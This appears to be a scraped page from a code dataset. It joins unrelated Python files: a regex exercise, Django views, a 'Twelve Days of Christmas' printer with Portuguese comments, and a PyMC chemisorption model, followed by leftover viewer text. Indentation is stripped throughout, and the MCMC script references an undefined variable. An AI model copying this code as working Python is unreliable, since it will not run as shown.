print(re.search(pattern1, col_names[3])) #None
pattern2 = re.compile('\Zlog')
print(re.search(pattern2, col_names[0]))
print(re.search(pattern2, col_names[1]))
print(re.search(pattern2, col_names[2]))
print(re.search(pattern2, col_names[3]))
'''
Mar-07, 2017
'''
#find string that ends with "log"
nojoke1 = re.findall("log$", col_names[0])
nojoke2 = re.findall("log$", col_names[2])
nojoke1c = re.search("log$", col_names[0])
nojoke2c = re.search("log$", col_names[2])
print(nojoke1)
print(nojoke2)
print(nojoke1c)
print(nojoke2c)
#find string that begins with "log"
nojoke3 = re.findall(r"^log", col_names[0])
nojoke4 = re.findall(r"^log", col_names[2])
nojoke3c = re.search(r"^log", col_names[0])
nojoke4c = re.search(r"^log", col_names[2])
print(nojoke3)
print(nojoke4)
print(nojoke3c)
print(nojoke4c)
|
from django.shortcuts import render
from django.shortcuts import render_to_response
from django.template import RequestContext
from .models import Project
# Create your views here.
def home(request):
return render_to_response('web/company_zh/home.html',{},context_instance=RequestContext(request))
def contact(request):
return render_to_response('web/company_zh/contact.html',{},context_instance=RequestContext(request))
def portfolio(request):
projects = Project.objects.all()
return render_to_response('web/company_zh/portfolio.html',{'projects':projects},context_instance=RequestContext(request))
|
"""
Programa feito em base a um desafio proposto por https://github.com/13Ax0
Todos os créditos vão á ele 13Ax0.
"""
from time import sleep
lista = ['2 Turtle Doves', '3 French hens', '4 calling birds', '5 golden rings', '6 geese a-laying', \
'7 swans a-swimming', '8 maids a-milking', '9 ladies dancing', '10 lords a-leaping', '11 pipers piping',\
'12 drummers drumming']
#Versos
def repor(x: str):
if 'st' in x: #1st >> 2nd
return x.replace('st', 'nd')
elif 'nd' in x: #2nd >> 3rd
return x.replace('nd', 'rd')
elif 'rd' in x: #3rd >> 4th
return x.replace('rd', 'th')
elif 'th' in x: #4t >> 5th
return x.replace('th', 'th')
else: pass
musica = ['My true love sent to me'] #Versos
day, pos = 1, 'st' #Aqui define o dia (1st)
x = 0 #Será um número para "fatiamento"
#Vai ajudar a pegar os versos na lista la emcima, linha 2
while day != 13: #Enquanto o dia n chegar a ser 13:
#Vai começar a música
print(f"On the {day}{pos} day of Christmas") #Começando com o dia.
for verso in musica: #Vai pegar os versos da lista musica
print(verso + ',') #E imprimi-los 1 por 1
#Após acabar esse loop (acima), ele vai terminar o refrão com
print('1 Partridge in a Pear Tree.\n', "~~"*25)# Este print
day += 1; pos = repor(pos) #Vai mudar para um novo dia
#Na primeira passagem, 1st >> 2nd, e assim vai, 2nd >> 3rd...
if day == 13:
break #Se o dia chegar a ser 13, o loop vai acabar
sleep(5) #Vai esperar 5 segundos pra soltar o proximo verso
musica.insert(1, lista[x]) #Vai passar para o proximo verso
x += 1 #x vai passar a ser 1, assim pegando outro verso da lista, linha 2
|
#!/usr/bin/env python
from ase import io
import numpy as np
from scipy import integrate
import pymc as pm
from scipy.signal import hilbert
import pickle, time, math
from chemisorption import namodel
from ase.db import connect
# load in data
db = connect('bayeschem.db')
List = [row.label for row in db.select()]
Vak2 = [row.vad for row in db.select()]
f = [row.filling for row in db.select()]
ergy = np.linspace(-15, 15, 3001)
fermiindex=np.argmax(ergy>=0)
dos_d = [row.data["dos_sub"] for row in db.select()]
dos_ads = [row.data["dos_ads"] for row in db.select()]
de = [row.data['de'] for row in db.select()]
print(List)
print(Vak2)
print(f)
print(dos_d)
print(dos_ads)
print(de)
dos_d = np.loadtxt('dos_d.txt')
y1_data = np.loadtxt('dos_ads.txt')
y2_data = np.load('E.npy')
# priors
Initeffadse = -5.0 #-5.0
Initbeta = 2.1 #2.0
Initdelta = 1.0 #1.0
InitAlpha = 0.036 #.5
InitEsp = -3.25 #-2.0
effadse = pm.Normal('effadse', -5.0, 1, value=Initeffadse)
beta = pm.Lognormal('beta', 2, 1, value=Initbeta)
delta = pm.Lognormal('delta', 1, 0.25, value=Initdelta)
alpha = pm.Uniform('alpha', 0, 1.0, value=InitAlpha)
Esp = pm.Normal('Esp', -3.25, 1, value=InitEsp)
var_1 = pm.InverseGamma('var_1', 2.0, 0.05, value=0.05)
var_2 = pm.InverseGamma('var_2', 2.0, 0.1, value=0.1)
a = len(ergy)
@pm.stochastic(observed=True)
def custom_stochastic(effadse=effadse, beta=beta, delta=delta,
alpha=alpha, Esp=Esp,
var_1=var_1, var_2=var_2,value=y1_data):
DATA = []
logp1 = 0
logp2 = 0
for i in range(len(List)):
Vak2_d = Vak2_d0[i] * beta
wdos = np.pi * Vak2_d * dos_d[i] + delta
wdos_ = np.array([delta for k in range(0, len(ergy))])
ergy_NA, dos_NA, na = namodel(effadse, wdos, wdos_,
delta, ergy)
dos_NA = dos_NA/integrate.cumtrapz(dos_NA, ergy, axis=0)[-1]
BE = Esp + (ergy_NA + 2 * (na + f[i])* alpha * Vak2_d)*3
logp1 += -2*math.log(var_1) * len(ergy) - np.sum((dos_NA-value[i])**2 / (2*var_1))
logp2 += -2*math.log(var_2) - (BE - y2_data[i])**2 / (2*var_2)
return logp1 + a * logp2
M = pm.MCMC([effadse,beta,delta,alpha,Esp,
var_1,var_2,custom_stochastic],
db='pickle', dbname='M.pickle')
M.sample(iter=200000, burn=0, thin=1)
M.db.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.